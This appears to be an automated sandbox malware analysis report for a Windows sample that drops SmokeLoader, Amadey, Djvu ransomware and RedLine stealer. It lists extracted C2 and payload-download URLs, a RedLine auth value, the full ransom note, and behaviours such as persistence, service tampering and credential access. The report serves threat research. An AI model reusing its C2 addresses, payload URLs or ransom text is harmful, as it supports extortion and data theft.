Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
27-03-2023 14:30
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230221-en
General
-
Target
file.exe
-
Size
250KB
-
MD5
988f1622b98be1cec133fc839e0fc918
-
SHA1
63c6eac78de3511f43d27bd16da72f0eb73bab1c
-
SHA256
b1b014d8c81723e8285abbf170aca64dd601ee8980e6bba866b214425cd53af5
-
SHA512
33340ad111dc62970ffd92169462eaf9a4baf71c59657cfbc13a6078a2e1021d5a09ffa0282c02a2356800e432e70ea3171681b583e2baaf10a0d8d972eea15a
-
SSDEEP
3072:PFQ8NoU+oWuudk4LxGRCVs/sePHyhKyAt8fvMk9qOGzIj5qbni:dvN0u2k4LMRgs/se/nCvrVGf+
Malware Config
Extracted
smokeloader
2022
http://potunulit.org/
http://hutnilior.net/
http://bulimu55t.net/
http://soryytlic4.net/
http://novanosa5org.org/
http://nuljjjnuli.org/
http://tolilolihul.net/
http://somatoka51hub.net/
http://hujukui3.net/
http://bukubuka1.net/
http://golilopaster.org/
http://newzelannd66.org/
http://otriluyttn.org/
http://aapu.at/tmp/
http://poudineh.com/tmp/
http://firsttrusteedrx.ru/tmp/
http://kingpirate.ru/tmp/
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
smokeloader
pub1
Extracted
smokeloader
sprg
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
djvu
http://zexeq.com/lancer/get.php
-
extension
.jypo
-
offline_id
MEMHlobHgXqvmTWaMsLcwGZhDOd00bblO1yevst1
-
payload_url
http://uaery.top/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-fkW8qLaCVQ Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0676JOsie
Extracted
redline
koreamon
koreamonitoring.com:80
-
auth_value
1a0e1a9f491ef3df873a03577dfa10aa
Signatures
-
Detect rhadamanthys stealer shellcode 2 IoCs
resource yara_rule behavioral2/memory/1232-1199-0x00000000009A0000-0x00000000009BC000-memory.dmp family_rhadamanthys behavioral2/memory/1232-1200-0x00000000009D0000-0x00000000009EA000-memory.dmp family_rhadamanthys -
Detected Djvu ransomware 15 IoCs
resource yara_rule behavioral2/memory/1952-232-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1952-234-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1952-236-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1616-235-0x0000000002470000-0x000000000258B000-memory.dmp family_djvu behavioral2/memory/1952-244-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1952-250-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2688-261-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2688-262-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2688-267-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2688-271-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2688-273-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2688-277-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2688-279-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2688-280-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2688-292-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 18 IoCs
resource yara_rule behavioral2/memory/1976-305-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-306-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-308-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-310-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-312-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-314-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-316-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-318-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-320-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-323-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-330-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-332-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-334-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-336-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-326-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-338-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-340-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline behavioral2/memory/1976-342-0x0000000004D80000-0x0000000004DD2000-memory.dmp family_redline -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 968 created 3144 968 XandETC.exe 51 PID 968 created 3144 968 XandETC.exe 51 PID 968 created 3144 968 XandETC.exe 51 PID 968 created 3144 968 XandETC.exe 51 PID 968 created 3144 968 XandETC.exe 51 PID 1204 created 3144 1204 updater.exe 51 PID 1204 created 3144 1204 updater.exe 51 PID 1204 created 3144 1204 updater.exe 51 PID 1204 created 3144 1204 updater.exe 51 PID 1204 created 3144 1204 updater.exe 51 PID 3068 created 3144 3068 conhost.exe 51 PID 1204 created 3144 1204 updater.exe 51 -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation A06.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation Player3.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 133F.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 1534.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 1534.exe -
Executes dropped EXE 22 IoCs
pid Process 4552 E777.exe 1188 E8CF.exe 884 FEC9.exe 1052 22.exe 4624 A06.exe 2900 Player3.exe 5060 ss31.exe 3048 nbveek.exe 968 XandETC.exe 4740 133F.exe 1616 1534.exe 3688 Player3.exe 1952 1534.exe 4628 1534.exe 2688 1534.exe 2616 nbveek.exe 1388 build3.exe 1976 523E.exe 1232 68B5.exe 1204 updater.exe 688 nbveek.exe 3944 mstsca.exe -
Loads dropped DLL 3 IoCs
pid Process 460 rundll32.exe 1520 rundll32.exe 3548 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4716 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook dllhost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\8f6628f7-6678-4ef6-b538-a8a2f4db0cc0\\1534.exe\" --AutoStart" 1534.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 49 api.2ip.ua 37 api.2ip.ua 39 api.2ip.ua -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 1232 68B5.exe 1232 68B5.exe 1232 68B5.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1616 set thread context of 1952 1616 1534.exe 116 PID 4628 set thread context of 2688 4628 1534.exe 123 PID 1204 set thread context of 3068 1204 updater.exe 201 PID 1204 set thread context of 2188 1204 updater.exe 207 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5044 sc.exe 2260 sc.exe 3120 sc.exe 4620 sc.exe 1428 sc.exe 4016 sc.exe 876 sc.exe 1136 sc.exe 2204 sc.exe 2148 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
pid pid_target Process procid_target 1968 1188 WerFault.exe 91 2188 1052 WerFault.exe 96 2824 4740 WerFault.exe 105 2496 1976 WerFault.exe 128 1532 1232 WerFault.exe 129 2420 3548 WerFault.exe 172 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E777.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FEC9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E777.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E777.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FEC9.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FEC9.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2120 schtasks.exe 3728 schtasks.exe 1636 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4196 file.exe 4196 file.exe 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3144 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 664 Process not Found -
Suspicious behavior: MapViewOfSection 21 IoCs
pid Process 4196 file.exe 4552 E777.exe 884 FEC9.exe 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeDebugPrivilege 1976 523E.exe Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeDebugPrivilege 3656 powershell.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeShutdownPrivilege 2236 powercfg.exe Token: SeCreatePagefilePrivilege 2236 powercfg.exe Token: SeShutdownPrivilege 2292 powercfg.exe Token: SeCreatePagefilePrivilege 2292 powercfg.exe Token: SeShutdownPrivilege 860 powercfg.exe Token: SeCreatePagefilePrivilege 860 powercfg.exe Token: SeShutdownPrivilege 2216 powercfg.exe Token: SeCreatePagefilePrivilege 2216 powercfg.exe Token: SeIncreaseQuotaPrivilege 1072 powershell.exe Token: SeSecurityPrivilege 1072 powershell.exe Token: SeTakeOwnershipPrivilege 1072 powershell.exe Token: SeLoadDriverPrivilege 1072 powershell.exe Token: SeSystemProfilePrivilege 1072 powershell.exe Token: SeSystemtimePrivilege 1072 powershell.exe Token: SeProfSingleProcessPrivilege 1072 powershell.exe Token: SeIncBasePriorityPrivilege 1072 powershell.exe Token: SeCreatePagefilePrivilege 1072 powershell.exe Token: SeBackupPrivilege 1072 powershell.exe Token: SeRestorePrivilege 1072 powershell.exe Token: SeShutdownPrivilege 1072 powershell.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeSystemEnvironmentPrivilege 1072 powershell.exe Token: SeRemoteShutdownPrivilege 1072 powershell.exe Token: SeUndockPrivilege 1072 powershell.exe Token: SeManageVolumePrivilege 1072 powershell.exe Token: 33 1072 powershell.exe Token: 34 1072 powershell.exe Token: 35 1072 powershell.exe Token: 36 1072 powershell.exe Token: SeIncreaseQuotaPrivilege 1072 powershell.exe Token: SeSecurityPrivilege 1072 powershell.exe Token: SeTakeOwnershipPrivilege 1072 powershell.exe Token: SeLoadDriverPrivilege 1072 powershell.exe Token: SeSystemProfilePrivilege 1072 powershell.exe Token: SeSystemtimePrivilege 1072 powershell.exe Token: SeProfSingleProcessPrivilege 1072 powershell.exe Token: SeIncBasePriorityPrivilege 1072 powershell.exe Token: SeCreatePagefilePrivilege 1072 powershell.exe Token: SeBackupPrivilege 1072 powershell.exe Token: SeRestorePrivilege 1072 powershell.exe Token: SeShutdownPrivilege 1072 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3144 wrote to memory of 4552 3144 Explorer.EXE 90 PID 3144 wrote to memory of 4552 3144 Explorer.EXE 90 PID 3144 wrote to memory of 4552 3144 Explorer.EXE 90 PID 3144 wrote to memory of 1188 3144 Explorer.EXE 91 PID 3144 wrote to memory of 1188 3144 Explorer.EXE 91 PID 3144 wrote to memory of 1188 3144 Explorer.EXE 91 PID 3144 wrote to memory of 884 3144 Explorer.EXE 95 PID 3144 wrote to memory of 884 3144 Explorer.EXE 95 PID 3144 wrote to memory of 884 3144 Explorer.EXE 95 PID 3144 wrote to memory of 1052 3144 Explorer.EXE 96 PID 3144 wrote to memory of 1052 3144 Explorer.EXE 96 PID 3144 wrote to memory of 1052 3144 Explorer.EXE 96 PID 3144 wrote to memory of 4624 3144 Explorer.EXE 99 PID 3144 wrote to memory of 4624 3144 Explorer.EXE 99 PID 3144 wrote to memory of 4624 3144 Explorer.EXE 99 PID 4624 wrote to memory of 2900 4624 A06.exe 100 PID 4624 wrote to memory of 2900 4624 A06.exe 100 PID 4624 wrote to memory of 2900 4624 A06.exe 100 PID 4624 wrote to memory of 5060 4624 A06.exe 101 PID 4624 wrote to memory of 5060 4624 A06.exe 101 PID 2900 wrote to memory of 3048 2900 Player3.exe 102 PID 2900 wrote to memory of 3048 2900 Player3.exe 102 PID 2900 wrote to memory of 3048 2900 Player3.exe 102 PID 4624 wrote to memory of 968 4624 A06.exe 103 PID 4624 wrote to memory of 968 4624 A06.exe 103 PID 3144 wrote to memory of 4740 3144 Explorer.EXE 105 PID 3144 wrote to memory of 4740 3144 Explorer.EXE 105 PID 3144 wrote to memory of 4740 3144 Explorer.EXE 105 PID 3048 wrote to memory of 2120 3048 nbveek.exe 104 PID 3048 wrote to memory of 2120 3048 nbveek.exe 104 PID 3048 wrote to memory of 2120 3048 nbveek.exe 104 PID 3048 wrote to memory of 1124 3048 nbveek.exe 107 PID 3048 wrote to memory of 1124 3048 nbveek.exe 107 PID 3048 wrote to memory of 1124 3048 nbveek.exe 107 PID 3144 wrote to memory of 1616 3144 Explorer.EXE 109 PID 3144 wrote to memory of 1616 3144 Explorer.EXE 109 PID 3144 wrote to memory of 1616 3144 Explorer.EXE 109 PID 4740 wrote to memory of 3688 4740 133F.exe 110 PID 4740 wrote to memory of 3688 4740 133F.exe 110 PID 4740 wrote to memory of 3688 4740 133F.exe 110 PID 1616 wrote to memory of 1952 1616 1534.exe 116 PID 1616 wrote to memory of 1952 1616 1534.exe 116 PID 1616 wrote to memory of 1952 1616 1534.exe 116 PID 1616 wrote to memory of 1952 1616 1534.exe 116 PID 1616 wrote to memory of 1952 1616 1534.exe 116 PID 1616 wrote to memory of 1952 1616 1534.exe 116 PID 1616 